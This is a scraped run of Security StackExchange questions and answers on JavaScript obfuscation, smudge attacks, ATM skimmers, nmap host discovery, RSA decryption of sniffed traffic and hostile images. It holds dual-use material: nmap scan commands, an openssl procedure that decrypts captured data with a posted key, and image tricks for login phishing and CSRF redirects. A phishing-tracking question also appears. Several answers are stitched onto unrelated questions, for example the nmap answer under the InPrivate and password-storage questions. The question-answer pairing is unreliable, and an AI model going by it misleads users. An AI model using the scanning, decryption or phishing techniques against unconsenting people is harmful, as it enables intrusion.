a better option. | {
"source": [
"https://security.stackexchange.com/questions/35818",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11996/"
]
} |
35,828 | Some Flash developers are afraid of JavaScript. Their point of view: Stealing JS source code is effortless, one would just 'view source' and copy it. Yes, you can decompile Flash bytecode, however it requires more time and knowledge. As a result, JavaScript is not suitable for commercial software development, because competitors will steal the code and put the original developer out of business. Does obfuscating JavaScript code make sense when developing commercial web applications? Are there any obfuscation techniques that actually work? Are large companies like Google obfuscating their web application code? For example, are Gmail or Google Drive somehow protected? | I think the operative word in the question here is "afraid." The aversion is based on fear, not fact. The reality is, the threat model isn't particularly realistic. Commercial web software development companies nearly universally use JavaScript these days, obfuscated or otherwise, and I challenge you to find me even a single example of one that's had its JS stolen by a competitor and then been driven out of business because of it. I'm quite confident that it hasn't happened, and isn't likely to. To your second question, do companies like Google obfuscate their JavaScript? Yes, but not for security! They obfuscate to minimize the size of the code, in order to reduce the download size and minimize the page load times. (See the Google Closure Compiler .) This is not necessarily how you'd obfuscate for security because the only goal is to minimize the number of bytes that have to be delivered to the client. This is what you should be focused on with JavaScript, not worrying about whether someone will be able to read it or not. | {
"source": [
"https://security.stackexchange.com/questions/35828",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22252/"
]
} |
35,831 | Suppose I use KeePassX as a password manager, and I store the kdb file in a SparkleShare folder as a way of backing up and syncing with multiple devices. The kdb file in itself would be encrypted, but if someone stole the git repo, they technically would have many versions of the same file with minor variations. Would that in any way reduce the security of the file? | If the encryption algorithm in question is weak against a Ciphertext-only attack, having multiple variants of an encrypted file might allow an attacker to decipher the ciphertext. Strong encryption algorithms, including AES, aren't susceptible to such attacks. You should be fine. | {
"source": [
"https://security.stackexchange.com/questions/35831",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/13510/"
]
} |
36,030 | After eating some garlic bread at a friend's who is not security-aware, she managed to quickly determine the PIN code to unlock the screen of my Samsung SIII. She figured this out by simply holding the device against the light and looking at the grease pattern my thumb left on the screen. It only took her 2 attempts to unlock the screen. I guess she would not have been able to access my phone if I had kept the screen cleaner, or if the device could only be unlocked by pressing numbers, rather than dragging the finger to form a pattern. Is this a common means of attack? Are finger dragging pattern passwords really more insecure than number touch passwords? | This is known as a 'Smudge Attack' It really depends on how much you've used your phone since you've last unlocked it, but the general principle still stands. If you use the pattern feature of Android phones, this can be particularly obvious. The University of Pennsylvania published a research paper on the topic and basically concluded that they could figure out the password over 90 percent of the time. The study also found that “pattern smudges,” which build up from writing the same password numerous times, are particularly recognizable. Furthermore: “We showed that in many situations full or partial pattern recovery is
possible, even with smudge ‘noise’ from simulated application usage or
distortion caused by incidental clothing contact,” While this is a plausible risk, It is not a particularly practical vulnerability as an attacker needs physical access to your phone. Using a PIN Code over a pattern may reduce the chance of this presenting a threat but it still exists depending on the strength of your PIN and the cleanliness of your hands/screen. However, these same researchers postulate another possible attack using the heat residue left by contact between your fingers and the screen which would be another problem altogether. Obviously, cleaning your screen after every use is a practical (and not too difficult) defense against this specific attack. I'd expect that if you have used your phone (say to make calls/send a message/any kind of web browsing) it would also sufficiently obfuscate the patterns/codes. From examining my screen this seems to be the case. | {
"source": [
"https://security.stackexchange.com/questions/36030",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20008/"
]
} |
36,135 | This question has been bothering me ever since I first heard of ATM skimmers : Instances of skimming have been reported where the perpetrator has put
a device over the card slot * of an ATM (automated teller machine),
which reads the magnetic strip as the user unknowingly passes their
card through it. These devices are often used in conjunction with
a miniature camera (inconspicuously attached to the ATM) to read the
user's PIN at the same time. This method is being used very
frequently in many parts of the world... source: Wikipedia * ATM skimmer device being installed on front of existing bank card slot (source: hoax-slayer.com ) Banks have so far responded to such threats by installing all kinds of anti-skimmer fascias and see-through plastic slot covers on their ATMs , spent a great deal on educating consumers on how to detect such devices with informative brochures, warning stickers on ATMs themselves, even added helpful information to ATM displays' welcome screens and whatnot, and yet I still can't think of a single, simple and bulletproof way of establishing whether any particular ATM is safe to use, or whether it might have been tampered with and devices installed onto it to collect our credit card information and record our PINs. Anti-fraud/anti-skimming device Here are a few suggestions I've been reading about: Check for cameras : Sometimes hackers looking to get PINs put cameras on the light above the keypad. Feel the top for anything
protruding that could be a camera. Pull on the card slot : Card stealers can't spend a long time messing with an ATM, so card skimmers are often easy to install and
remove. If the card reader at the ATM moves or seems loose, don't risk
it. Wiggle the keypad : Hackers sometimes put fake keypads over the real one to figure out your PIN. If the keypad seems loose, try a
different ATM. source: consumerist.com Hackers are getting smarter though, and technology to enable more advanced and harder-to-detect skimming devices is becoming more widespread (e.g. 3D printers, tiny cameras that can record PINs through a pinhole,...). So how are we, consumers, supposed to detect all of this? ATMs themselves vary greatly bank to bank, country to country. Sometimes, even the same banks will use multiple different ATMs, and anti-skimming fascias might be different altogether. Hackers might have super-glued an overlay keyboard and the skimmer, the camera can be so tiny and hidden so well it would be nigh impossible to detect, or the complete circuitry (reader, camera, the whole shebang) extremely well disguised to look nearly identical to the ATM's original fascia. ATM skimmer showing slot cover and pinhole for PIN camera. Would you have noticed it? The example in the photograph above could be scarier, if it was in matching colour and texture to the ATM's own plastic fascia, and maybe cut a bit nicer too. Nothing too hard to do, really. But even as it is, it's still disguised well enough to fool any slightly too casual customer in daylight, and possibly even the most cautious ones at night and under artificial illumination. Notice how tiny the camera pinhole is. Put a smudge of dirt around the pinhole, and it would be unnoticeable. So with all this in mind, my question is: How can we detect, in reasonable time and assuming the attackers have in the meantime become smarter and better equipped than what we have learned so far, if an ATM was tampered with and any skimming devices (or other traps) installed onto it? I've left the question intentionally slightly open to interpretation and am interested in both the latest & greatest ATM anti-fraud technology used by banks, as well as any good suggestions on how an average ATM user could detect such fraud schemes and devices, if present. | From an end user perspective, I usually give the reader and surrounding plates a good whack with my fist and I try to peel back any of the faceplates with my keys or a knife. The fact of the matter is, the best quality skimmers aren't detectable. POS machines can be hacked, which results in an almost undetectable scenario. Your best bet, if you want to avoid being skimmed, is to cash out at a teller at the bank :) From a company perspective, I've come across two new defenses against skimmers recently from perusing ATM manuals (I'm doing some work with them at the moment and have all the manuals/specifications) 1) Sensors to detect any obstruction in front of the card reader; if something blocks it for extended periods of time, it'll trigger an alert. These sensors are light sensors, proximity sensors and beam sensors depending on the ATM in question. These are mounted both inside the card reader and around the device in general. 2) Sensors to detect constant RF signals. If you transmit for more than xx seconds (I won't mention the exact time frame) it'll trigger an alert. From the manual: Radio frequency (RF) detection is used for detection of analogue
transmitting spy cameras fitted to the ATM for purposes of
fraudulently capturing card holder PIN entry. RF detection does not
trigger an alert but provides additional supporting information to an
alert if a fraud device is detected by a sensor at the same time as an
RF detect alert. Additionally: HSFD consists of the following elements: Control board RF detect sensor (optional) From one to six sensors Cellular modem (to transmit alerts), with separate antenna (optional). The following diagram shows an overview of the High Security Fraud Detection (HSFD) feature. Dashed lines indicate optional components: Alerts usually go to a back-to-base central monitoring solution somewhere, controlled by the bank that owns the ATM. There's a new proof-of-concept anti-skimming technology called SRS “Secure revolving system” that was announced recently; there's a video of it in action here . Original story here The actual SRS device looks like this: Basically it accepts the card 'side on' (as opposed to the usual card entry method) and then rotates it 90 degrees before accepting it. This basically prevents any face plate being attached over the device and makes it very difficult to position a skimmer.
"source": [
"https://security.stackexchange.com/questions/36135",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20074/"
]
} |
36,198 | I am trying to find the live hosts on my network using nmap. I am scanning the network in Ubuntu using the command sudo nmap -sP 192.168.2.1/24 . However, I am unable to find the live hosts. I just get the network address of my own PC as live. When I see the DHCP client list through my browser (my router can be accessed via browser using my network IP), I get around 10 live hosts on the network. Can anyone tell me the reason why this could be happening and how do I find the live hosts on my network? | This is the simplest way of performing host discovery with nmap. nmap -sP 192.168.2.1/24 Why does it not work all the time ? When this command runs nmap tries to ping the given IP address range to check if the hosts are alive. If ping fails it tries to send syn packets to port 80 (SYN scan). This is not hundred percent reliable because modern host based firewalls block ping and port 80. Windows firewall blocks ping by default. The hosts you have on the network are blocking ping and the port 80 is not accepting connections. Hence nmap assumes that the host is not up. So is there a workaround to this problem? Yes. One of the options that you have is using the -P0 flag which skips the host discovery process and tries to perform a port scan on all the IP addresses (In this case even vacant IP addresses will be scanned). Obviously this will take a large amount of time to complete the scan even if you are in a small (20-50 hosts) network. but it will give you the results. The better option would be to specify custom ports for scanning. Nmap allows you to probe specific ports with SYN/UDP packets. It is generally recommended to probe commonly used ports e.g. TCP-22 (ssh) or TCP-3389 (windows remote desktop) or UDP-161 (SNMP). sudo nmap -sP -PS22,3389 192.168.2.1/24 #custom TCP SYN scan
sudo nmap -sP -PU161 192.168.2.1/24 #custom UDP scan N.B. even after specifying custom ports for scanning you may not get an active host. A lot depends on how the host is configured and which services it is using. So you just have to keep probing with different combinations. Remember, do not perform scans on a network without proper authorization. update : When scanning a network you can never be sure that a particular command will give you all the desired results. The approach should be to start with a basic ping sweep and if it doesn't work try guessing the applications that may be running on the hosts and probe the corresponding ports. The idea of using Wireshark is also interesting. You may want to try sending ACK packets. nmap -sP -PA21,22,25,3389 192.168.2.1/24 #21 is used by ftp update two: The flags -sP and -P0 are now known as -sn and -Pn respectively. However the older flags are still found to be working in the newer versions. (A small Python wrapper sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/36198",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18637/"
]
} |
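A small wrapper around the same host-discovery probes discussed above can help script repeated sweeps. This is only a sketch: the port list and address range are illustrative, it assumes the nmap binary is installed, and it should only be pointed at networks you are authorized to scan.

```python
import re
import subprocess
import sys

def discover(cidr, ports="22,3389"):
    # -sn/-PS are the current spellings of the older -sP/-PS usage shown above.
    out = subprocess.run(["nmap", "-sn", "-PS" + ports, cidr],
                         capture_output=True, text=True, check=True).stdout
    # Each live host shows up as a "Nmap scan report for ..." line.
    return re.findall(r"Nmap scan report for (\S+)", out)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.2.0/24"
    for host in discover(target):
        print(host)
```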
36,208 | I heard that it is possible to use EnCase to recover IE InPrivate browsing history. Is this really possible? If so, suppose that a computer has been shut down right after usage of InPrivate browsing in IE (e.g. there are tabs opened, and users just shut down the whole computer without shutting down windows.) How much would history be likely recovered? | This is the simplest way of performing host discovery with nmap. nmap -sP 192.168.2.1/24 Why does it not work all the time ? When this command runs nmap tries to ping the given IP address range to check if the hosts are alive. If ping fails it tries to send syn packets to port 80 (SYN scan). This is not hundred percent reliable because modern host based firewalls block ping and port 80. Windows firewall blocks ping by default. The hosts you have on the network are blocking ping and the port 80 is not accepting connections. Hence nmap assumes that the host is not up. So is there a workaround to this problem? Yes. One of the options that you have is using the -P0 flag which skips the host discovery process and tries to perform a port scan on all the IP addresses (In this case even vacant IP addresses will be scanned). Obviously this will take a large amount of time to complete the scan even if you are in a small (20-50 hosts) network. but it will give you the results. The better option would be to specify custom ports for scanning. Nmap allows you to probe specific ports with SYN/UDP packets. It is generally recommended to probe commonly used ports e.g. TCP-22 (ssh) or TCP-3389 (windows remote desktop) or UDP-161 (SNMP). sudo nmap -sP -PS22,3389 192.168.2.1/24 #custom TCP SYN scan
sudo nmap -sP -PU161 192.168.2.1/24 #custom UDP scan N.B. even after specifying custom ports for scanning you may not get an active host. A lot depends on how the host is configured and which services it is using. So you just have keep probing with different combinations.Remember, do not performs scans on a network without proper authorization. update : When scanning a network you can never be sure that a particular command will give you all the desired results. The approach should be to start with basic ping sweep and if it doesn't work try guessing the applications that may be running on the hosts and probe the corresponding ports. The idea of using Wireshark is also interesting. You may want to try sending ACK packets. nmap -sP -PA21,22,25,3389 192.168.2.1/24 #21 is used by ftp update two: The flags -sP and -P0 are now known as -sn and -Pn respectively. However the older flags are still found to be working in the newer versions. | {
"source": [
"https://security.stackexchange.com/questions/36208",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26198/"
]
} |
36,223 | I've found many posts on StackOverflow and other sites using Google, but since security is always changing, and what was safe a few months ago not me anymore... I felt the need to ask on here. Unfortunately my server does not support Blowfish. I am looking for the most simple way possible to store passwords safely. | This is the simplest way of performing host discovery with nmap. nmap -sP 192.168.2.1/24 Why does it not work all the time ? When this command runs nmap tries to ping the given IP address range to check if the hosts are alive. If ping fails it tries to send syn packets to port 80 (SYN scan). This is not hundred percent reliable because modern host based firewalls block ping and port 80. Windows firewall blocks ping by default. The hosts you have on the network are blocking ping and the port 80 is not accepting connections. Hence nmap assumes that the host is not up. So is there a workaround to this problem? Yes. One of the options that you have is using the -P0 flag which skips the host discovery process and tries to perform a port scan on all the IP addresses (In this case even vacant IP addresses will be scanned). Obviously this will take a large amount of time to complete the scan even if you are in a small (20-50 hosts) network. but it will give you the results. The better option would be to specify custom ports for scanning. Nmap allows you to probe specific ports with SYN/UDP packets. It is generally recommended to probe commonly used ports e.g. TCP-22 (ssh) or TCP-3389 (windows remote desktop) or UDP-161 (SNMP). sudo nmap -sP -PS22,3389 192.168.2.1/24 #custom TCP SYN scan
sudo nmap -sP -PU161 192.168.2.1/24 #custom UDP scan N.B. even after specifying custom ports for scanning you may not get an active host. A lot depends on how the host is configured and which services it is using. So you just have keep probing with different combinations.Remember, do not performs scans on a network without proper authorization. update : When scanning a network you can never be sure that a particular command will give you all the desired results. The approach should be to start with basic ping sweep and if it doesn't work try guessing the applications that may be running on the hosts and probe the corresponding ports. The idea of using Wireshark is also interesting. You may want to try sending ACK packets. nmap -sP -PA21,22,25,3389 192.168.2.1/24 #21 is used by ftp update two: The flags -sP and -P0 are now known as -sn and -Pn respectively. However the older flags are still found to be working in the newer versions. | {
"source": [
"https://security.stackexchange.com/questions/36223",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26214/"
]
} |
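Illustrating the nmap answer above: a minimal Python sketch (not part of the original answer) that wraps the same host-discovery probes with the subprocess module. The target range, the probe ports and the assumption that nmap is on the PATH are all illustrative; UDP and ACK probes generally need root, and you should only scan networks you are authorized to test.

import subprocess

TARGET = "192.168.2.0/24"   # assumed example range -- use your own, authorized, network
PROBES = [
    ["-sn"],                      # plain ping sweep (modern spelling of -sP)
    ["-sn", "-PS22,3389"],        # TCP SYN probes to ssh / RDP
    ["-sn", "-PA21,22,25,3389"],  # TCP ACK probes (21 is used by ftp)
    ["-sn", "-PU161"],            # UDP probe to SNMP
]

def run_sweep(extra_args):
    """Run one nmap host-discovery pass and return its raw text output."""
    cmd = ["nmap", *extra_args, TARGET]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout

if __name__ == "__main__":
    for probe in PROBES:
        print("--- nmap " + " ".join(probe) + " " + TARGET + " ---")
        print(run_sweep(probe))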
36,316 | I wanted to install the Linkedin app on my Android phone and I was shocked when it asked for nearly all possible permissions including reading all of my private data and calendar data . Why does any application like Linkedin which is probably implemented as a simple webview possibly need access to such sensible data? Can I consider this as spyware? | @Stolas has already explained that the only way to be sure what an application does is to reverse engineer it and inspect its code, and @RoryAlsop already described why such access permissions are required from the application architectural point of view. But there's one thing that I feel I should add. I think there's not much to worry about here. Why? LinkedIn is a fairly big player and as such under constant scrutiny of the public eye, like all the big ones are. If they were up to no good and trying to access data you didn't agree to in their TOS, and/or otherwise misuse them, they would have to deal with big problems keeping that under the rug and risk huge loss in their reputation and credibility, possibly even be a subject to legal prosecution and financial loss that would come with it, if it were ever to become public knowledge. You see, these apps aren't developed by a few tightly controlled developers kept in some basement and only allowed access to daylight once thoroughly brainwashed for any residual disclosing information. I'm being slightly sarcastic here, but I believe that living under constant paranoia is even more damaging to one's mental health than my opinion compressed in a few lines could ever be. Anyway, if LinkedIn (and this goes for any other big player in the field of social networking out there) was misusing your personal information in a way that is not clearly described in end user agreement (or other such documentation) you agreed to upon signing up for their services, and/or installing their software, chances are extremely big you'd be reading about that in the news and LinkedIn wouldn't exist anymore; One of the developers would suffer guilty consciousness and blow a whistle on them to relieve the pressure and hopefully sleep better. Or, an independent researcher would find interesting inner workings of the code he/she just reverse-engineered from a signed install package LinkedIn is publishing. Or, a sleepless networking expert (not to be confused with script kiddies ) would find some such indicative network packets being exchanged between his test client that he setup and a LinkedIn server, that the downloaded app was responsible for. Or, an IT security professional will be asked to assess potential threats some company faces with their BYOD policy. Vulnerability assessment will include some of the most common Android device software, and the mentioned LinkedIn Android app will be most likely among the first ones tests will be conducted on. Regardless who would be the first to discover it, LinkedIn could either be blackmailed and settle it privately (which could still leak eventually), or have to defend themselves in front of the eyes of the public. Both of which would incur cost to the corporation, something they don't appreciate, not in the least bit. And since alternatives to illegally exploiting your personal data are a lot cheaper, that's what they do. They test their code thoroughly for compliance with all kinds of regulations, sign them with certificates that prevent install package tampering, and they're proud to display that to end users too. 
The rest is then between you (your free will to disclose your personal information to whomever you want) and LinkedIn (the ones that will gladly take it and turn it into profit). That said, it's up to you to decide how intrusive you find such social networking symbiosis, and whether you should call it spyware. | {
"source": [
"https://security.stackexchange.com/questions/36316",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11498/"
]
} |
36,358 | I am sniffing a client side application traffic and I found some encrypted data. I am not able to decrypt it. Information which I have is Public Key: MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHfIm5pYrEMUuJUevmED6bUFx8p9G/5vF+ia+Qnrn8OeMpIJ/KS2nqDLxXx/ezNKlFArWK1Wer4diwQJ2cdiCqNorubAgnOXMV+/FsiATQjMT2E2lI9xUWqqNq+PfgyCPILRliNHT/j2qOvAOHmf3a1dP8lcpvw3x3FBBKpqtzqJAgMBAAE= Private Key: MIICWAIBAAKBgHfIm5pYrEMUuJUevmED6bUFx8p9G/5vF+ia+Qnrn8OeMpIJ/KS2nqDLxXx/ezNKlFArWK1Wer4diwQJ2cdiCqNorubAgnOXMV+/FsiATQjMT2E2lI9xUWqqNq+PfgyCPILRliNHT/j2qOvAOHmf3a1dP8lcpvw3x3FBBKpqtzqJAgMBAAECgYAJ1ykxXOeJ+0HOvl/ViITCol7ve6e5F1dXfKPI9NqDL5Pn+3oN7hLKEvN+btqoNBBLJcR7OQeMZtDs3AJQJvXIqN4UJUBf6fUshhdf9Y5MSpSqAjlqLjted2uw8xuL8gDmOYWV0yjeivvb4Qf7Vl7jAJSBwnlVsGCKmmBXDn+EoQJA63MnjKX1kWVb44HmXX+IDmgTQE6Ezpqzxbjf7ySdxYLb4yfZR+i5oEE+xtqEO5xR4vkEV5s1MuXjNdJHTkc2XwJAgj0HsrIGFw2DgyWF2Rc1w5BbtXH0+GrLTP6+kOuLw1eAZbDjQghzRGmhtdrl38ZtYZMdsrxE2HXDihsdjj2oFwJAl6470FQp+1z88XgB3EIIeJ97p3XuANuQ7NPJD9ra+R7wYUqOo9C9pQvjUV/8yBpQdpRNw9JtVzjaQxYQcdFWqQJAALclG64uqmHAny/NlGu0N+bLGiwOFG9BvqKHmXQxyFjqs6RNG0fAmleaM82IBbqpTyfnudue5TGAaXnMp8Ne8QJAKx/zf5AKPTkqZ7hBQ3IYfx7EbS2f6lelf8BNC+A/iz4dxLgx7AupPtoaKZC0Z6FWpm2s0HNvYhleU3FcAfKRig== Encrypted string: MpTF1+cqa23PdxQ6EoG9E77jfRJGYjORc4omawTg/g8jtUDZNNEeEr3waadTSLjQAfmJO94fpaA145yanoU9khrzCd/nAGIIAVwMC67UnsX+XY6dOEZMo41Z0dU1n42rUtkdXgldHXR1SQXaeDyjRnMj/mMMreNdykl8b4vNVPk= I am able to retrieve all the keys, But I am not able to view encrypted content. Help me to decrypt with procedures. | Start with saving the three parts respectively to pub.b64 , priv.b64 and blob.b64 : $ base64 -d < pub.b64 | openssl asn1parse -inform DER -i
0:d=0 hl=3 l= 158 cons: SEQUENCE
3:d=1 hl=2 l= 13 cons: SEQUENCE
5:d=2 hl=2 l= 9 prim: OBJECT :rsaEncryption
16:d=2 hl=2 l= 0 prim: NULL
18:d=1 hl=3 l= 140 prim: BIT STRING Clearly not an X.509v3 certificate. No matter, we don't need that to decrypt. openssl asn1parse isn't up to the heavy lifting here, so try Peter Gutmann's dumpasn1 to peek inside the bit string: $ base64 -d < pub.b64 > pub.der
$ dumpasn1 -al pub.der
0 158: SEQUENCE {
3 13: SEQUENCE {
5 9: OBJECT IDENTIFIER rsaEncryption (1 2 840 113549 1 1 1)
: (PKCS #1)
16 0: NULL
: }
18 140: BIT STRING, encapsulates {
22 136: SEQUENCE {
25 128: INTEGER
: 77 C8 9B 9A 58 AC 43 14 B8 95 1E BE 61 03 E9 B5
: 05 C7 CA 7D 1B FE 6F 17 E8 9A F9 09 EB 9F C3 9E
: 32 92 09 FC A4 B6 9E A0 CB C5 7C 7F 7B 33 4A 94
: 50 2B 58 AD 56 7A BE 1D 8B 04 09 D9 C7 62 0A A3
: 68 AE E6 C0 82 73 97 31 5F BF 16 C8 80 4D 08 CC
: 4F 61 36 94 8F 71 51 6A AA 36 AF 8F 7E 0C 82 3C
: 82 D1 96 23 47 4F F8 F6 A8 EB C0 38 79 9F DD AD
: 5D 3F C9 5C A6 FC 37 C7 71 41 04 AA 6A B7 3A 89
156 3: INTEGER 65537
: }
: }
: } That's more like it, we have what appears to be a 1024-bit modulus, and a likely public exponent of 65537. The key is a base64 encoded normal RSA key in DER (binary) format: $ base64 -d priv.b64 | openssl rsa -inform DER > out.key
writing RSA key
$ cat out.key
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgHfIm5pYrEMUuJUevmED6bUFx8p9G/5vF+ia+Qnrn8OeMpIJ/KS2
nqDLxXx/ezNKlFArWK1Wer4diwQJ2cdiCqNorubAgnOXMV+/FsiATQjMT2E2lI9x
UWqqNq+PfgyCPILRliNHT/j2qOvAOHmf3a1dP8lcpvw3x3FBBKpqtzqJAgMBAAEC
gYAJ1ykxXOeJ+0HOvl/ViITCol7ve6e5F1dXfKPI9NqDL5Pn+3oN7hLKEvN+btqo
NBBLJcR7OQeMZtDs3AJQJvXIqN4UJUBf6fUshhdf9Y5MSpSqAjlqLjted2uw8xuL
8gDmOYWV0yjeivvb4Qf7Vl7jAJSBwnlVsGCKmmBXDn+EoQJBAOtzJ4yl9ZFlW+OB
5l1/iA5oE0BOhM6as8W43+8kncWC2+Mn2UfouaBBPsbahDucUeL5BFebNTLl4zXS
R05HNl8CQQCCPQeysgYXDYODJYXZFzXDkFu1cfT4astM/r6Q64vDV4BlsONCCHNE
aaG12uXfxm1hkx2yvETYdcOKGx2OPagXAkEAl6470FQp+1z88XgB3EIIeJ97p3Xu
ANuQ7NPJD9ra+R7wYUqOo9C9pQvjUV/8yBpQdpRNw9JtVzjaQxYQcdFWqQJAALcl
G64uqmHAny/NlGu0N+bLGiwOFG9BvqKHmXQxyFjqs6RNG0fAmleaM82IBbqpTyfn
udue5TGAaXnMp8Ne8QJAKx/zf5AKPTkqZ7hBQ3IYfx7EbS2f6lelf8BNC+A/iz4d
xLgx7AupPtoaKZC0Z6FWpm2s0HNvYhleU3FcAfKRig==
-----END RSA PRIVATE KEY----- If you decode that key: $ openssl asn1parse < out.key
0:d=0 hl=4 l= 600 cons: SEQUENCE
4:d=1 hl=2 l= 1 prim: INTEGER :00
7:d=1 hl=3 l= 128 prim: INTEGER
:77C89B9A58AC4314B8951EBE6103E9B505C7CA7D1BFE6F17E89AF9
09EB9FC39E329209FCA4B69EA0CBC57C7F7B334A94502B58AD567A
BE1D8B0409D9C7620AA368AEE6C0827397315FBF16C8804D08CC4F
6136948F71516AAA36AF8F7E0C823C82D19623474FF8F6A8EBC038
799FDDAD5D3FC95CA6FC37C7714104AA6AB73A89
138:d=1 hl=2 l= 3 prim: INTEGER :010001
[...snip...] and compare with the dumpasn1 decoding of the public key, you can see that they share a 1024 bit modulus and exponent, so it looks like the public and private key match. Good. So, decode your encrypted data: $ base64 -d blob.b64 > blob and decrypt it: $ openssl rsautl -decrypt -inkey out.key < blob > decrypted
$ hexdump decrypted
0000000 0355 1739 575b 5434 ccc5 bec7 e70a 0d44
0000010 a4a9 11d4 166c 3423 4e36 e657 2fea ef53 That's 32 bytes (256 bits), quite likely a key used in a symmetric cipher to encrypt more data, since you can only encrypt relatively small amounts of data with RSA. Good luck with the next part ;-) (A Python version of this last decryption step is sketched after this entry.) | {
"source": [
"https://security.stackexchange.com/questions/36358",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19800/"
]
} |
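For comparison with the openssl walkthrough above, here is a hedged sketch of the final decryption step using the pyca/cryptography package (a reasonably recent release is assumed). It reuses the out.key PEM file the answer already produced and applies PKCS#1 v1.5 padding, which is what openssl rsautl -decrypt uses by default; file names match the ones used in the answer.

import base64

from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.serialization import load_pem_private_key

# out.key is the PEM private key extracted in the answer; blob.b64 is the encrypted string.
with open("out.key", "rb") as f:
    private_key = load_pem_private_key(f.read(), password=None)
with open("blob.b64", "rb") as f:
    ciphertext = base64.b64decode(f.read())

# openssl rsautl -decrypt defaults to PKCS#1 v1.5 padding.
plaintext = private_key.decrypt(ciphertext, padding.PKCS1v15())
print(plaintext.hex())   # should print the same 32 bytes the hexdump showed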
36,420 | I just wonder how some website like WhatIsMyIP find out what your real IP address is, even if you use proxy server. It said : Proxy Detected and then they give your real IP address. Is it possible they use JavaScript to send HTTP request for not using web browser proxy settings(How could it be implemented by Java) or there is some magic technique? | There are several ways: Proxy headers, such as X-Forwarded-For and X-Client-IP , can be added by non-transparent proxies. Active proxy checking can be used - the target server attempts to connect to the client IP on common proxy ports (e.g. 8080) and flags it as a proxy if it finds such a service running. Servers can check if the request is coming from an IP that is a known proxy. WhatsMyIP probably has a big list of these, including common ones like HideMyAss. Web client software (e.g. Java applets or Flash apps) might be able to read browser settings, or directly connect to a web service on the target system (bypassing the proxy) to verify that the IPs match. Mobile app software can identify the client IP. Example: PhoneGap plugin | {
"source": [
"https://security.stackexchange.com/questions/36420",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
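A rough sketch (not from the answer above) of how a "what is my IP" style service might combine two of the listed checks, header inspection and a known-proxy list, using Flask. The route name and the tiny proxy list are invented for illustration; real services maintain large, frequently updated proxy databases.

from flask import Flask, jsonify, request

app = Flask(__name__)

# Hypothetical "known proxy" list; real services use big, regularly refreshed databases.
KNOWN_PROXY_IPS = {"203.0.113.10", "198.51.100.7"}

@app.route("/whoami")
def whoami():
    remote = request.remote_addr
    forwarded = request.headers.get("X-Forwarded-For")
    client_ip = request.headers.get("X-Client-IP")
    proxy_suspected = bool(forwarded or client_ip) or remote in KNOWN_PROXY_IPS
    return jsonify({
        "connecting_ip": remote,
        "x_forwarded_for": forwarded,
        "x_client_ip": client_ip,
        "proxy_suspected": proxy_suspected,
    })

if __name__ == "__main__":
    app.run(port=8080)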
36,437 | I am trying to create a phishing email for a project I am on. In the email I want to link to a site that will collect the visitor's IP, browser, and date/time of the visit. Nothing malicious, just to prove that users clicked the link.
Can I do this in social engineering toolkit or is it not possible? | There are several ways: Proxy headers, such as X-Forwarded-For and X-Client-IP , can be added by non-transparent proxies. Active proxy checking can be used - the target server attempts to connect to the client IP on common proxy ports (e.g. 8080) and flags it as a proxy if it finds such a service running. Servers can check if the request is coming from an IP that is a known proxy. WhatsMyIP probably has a big list of these, including common ones like HideMyAss. Web client software (e.g. Java applets or Flash apps) might be able to read browser settings, or directly connect to a web service on the target system (bypassing the proxy) to verify that the IPs match. Mobile app software can identify the client IP. Example: PhoneGap plugin | {
"source": [
"https://security.stackexchange.com/questions/36437",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/13718/"
]
} |
36,447 | Is it safe to display images from arbitrary domains? I.e. let's say I have an image on my page: <img src="http://badguy.com/image.gif" /> What if image.gif will return some js attack vector, but not the image? Is there any known vectors? I've tried to serve javascript:alert(1) or the same, but base64 encoded. But without any luck. Any ideas? | There used to be a "vulnerability" where the image could send a HTTP 401 Unauthenticated response, which would trigger a login screen for the user. If you set this as forum avatar, it would spawn a login popup for anyone visiting a page where your avatar appears. Lots of people will then attempt to log in with some username and password combination, probably the one for their forum account. A friend of mine found this a few years ago, but nowadays it doesn't seem to work anymore. At least I couldn't easily reproduce it a few months back. Edit: I was wrong, this attack is still possible! /edit As for XSS attacks this way, you're safe. The browser will, or should, always interpret this as an image no matter what it contains or what headers it sends. You can customize the image based on the request (serving a small image to the forum software prechecking the image so that it doesn't downscale it, then large for everyone else). Or feed the browser lots of gif-data until memory runs out or something. But there are no real big vulnerabilities here that allow Remote Code Execution as far as I know. What you are only moderately safe for are CSRF-attacks. The image can issue a HTTP 302 Moved Temporarily response and link to a new location. For example it could link to, I don't remember the specific URL, something like https://accounts.google.com/logout and log you out of google (this worked a few months ago). Or, slightly more maliciously: http://example.com/guestbook.php?action=post&message=spam-url.example.com . Only GET requests can be done this way as far as I know. Or if the image was originally being loaded as POST request, I suppose it could also redirect the POST, but not change the POST-data. So that's pretty safe. Last but not least, if the attacker controls URLs of for example forum avatars (such as in SMF forums), it's possible to obtain information from visitors such as their IP address. I wrote a tool a while ago that used the action=who page of SMF to link IP addresses to usernames. When I started displaying that to users (show "Hello $username with IP: $IP" in the image) all hell broke loose. "How could you possibly know that?!" They were mostly early- to mid-teen techies so they knew what an IP address was, but didn't know that I couldn't hack them with it. It is however considered to be personally identifiable information, at least in the Netherlands, so the admins weren't quite happy about this practice. If you don't display it though, nobody will ever know. Note: If this post seems hastily written, it is. I'm barely awake too. Perhaps I'll clean it up tomorrow if it's too much storytelling and not naming enough concrete facts and vulnerabilities. Hope this helped anyway! | {
"source": [
"https://security.stackexchange.com/questions/36447",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6869/"
]
} |
